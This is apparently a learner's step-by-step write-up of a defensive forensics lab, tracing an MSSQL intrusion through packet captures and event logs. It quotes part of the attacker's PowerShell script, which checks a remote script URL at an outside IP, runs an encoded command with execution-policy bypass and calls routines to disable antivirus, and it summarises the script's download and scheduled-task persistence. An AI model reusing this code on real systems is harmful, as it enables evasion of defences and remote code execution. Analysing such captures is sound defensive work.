1-To detect the IP Which That Responsible for the port scanning i used the same Criteria which is open the Requests HTTP tab and easily detect it the first IP made a lot of requests and all of it seems suspicious always makes your eyes see quickly what happen to easily and smoothly predict what should you do in the next move
2-To determine the account targeted username the easiest way is to open network miner and discover the Credentials is The tab in network miner which is show us directly which account is targeted "defend smarter not harder"
3- To detect the password i use the same way for the username
4- To identify which the setting the attacker changes i open Network Miner parameters section and there is a RECONFIGURE parameter and the bellow query show the changes was happen which is the "xp_cmdshell"
5-To detect the process injection i check the event viewer and start to open every event and read the details until i found the Host-name=MSFConsole it is our lover metasploit so detect the Host Application Which is the one of the devils in our story
5-To get The file that the attacker attempt to download i add the attacker ip as filter + request method get
6-To understand which SID the script checked i think it`s a perfect time to understand what is the script is do
The scripts works to determine a lot of things in the same time in overview
Determine Privilege Level: Checks if the script is running with administrative privileges.
Determine OS Version: Retrieves the major version of the operating system.
Set Error Preferences: Configures error handling to suppress warnings and errors.
Define URL: Specifies a URL to interact with.
Test URL Reachability: Checks if specified URLs are reachable.
Stop Antivirus Services: Attempts to disable Windows Defender and other antivirus services.
Download and Schedule Tasks: Downloads additional scripts and schedules them to run periodically.
$scriptUrl ="http://87.96.21.84/del.ps1"if (Test-URL-url $url) {Write-Host"Connection to $url successful. Proceeding with execution."if (Test-ScriptURL-scriptUrl $scriptUrl) {Write-Host"Script at $scriptUrl is reachable."if ($priv) { CleanerEtc $encodedDiscovery ="SW52b2tlLUV4cHJlc3Npb24gIndob2FtaSI=" $decodedDiscovery = [System.Convert]::FromBase64String($encodedDiscovery) $commandDiscovery = [System.Text.Encoding]::UTF8.GetString($decodedDiscovery) powershell -exec bypass -w 1 $commandDiscoveryWrite-Host"Privilege level: SYSTEM" } else { CleanerNoPrivWrite-Host"Privilege level: User" } } else {Write-Host"Script at $scriptUrl is not reachable. Terminating."exit }} else {Write-Host"Connection to $url failed. Terminating."exit}if ($priv -eq$true) {try { StopAV } catch {}Start-Sleep-Seconds 1 CleanerEtc} else { CleanerNoPriv}
Checks Connectivity: If the base URL is reachable, it proceeds; otherwise, it terminates.
Checks Script Availability: If the script URL is reachable, it continues based on the privilege level.
Privileged User: Executes CleanerEtc and a base64-decoded command (Invoke-Expression "whoami").
Non-Privileged User: Executes CleanerNoPriv.
Disables AV: If privileged, attempts to disable antivirus services before running the cleaner functions again.
so after explain the script we can determine the SUID
8-To determine the registry keys used i go to the Function StopAV in the script and determine the keys
9-The Second Download URL is firstly appear in CleanerETC function
10-After Analysis the script everything will be easy in the function CleanerETC we can determine that the precestince task
11- The Second script is del.ps1 and i determine it with two ways the same filter in wireshark and networkminer after analysis this script the most important thing from my view is Stop-Process Command which is directly Defend_Evasion according to Mitre
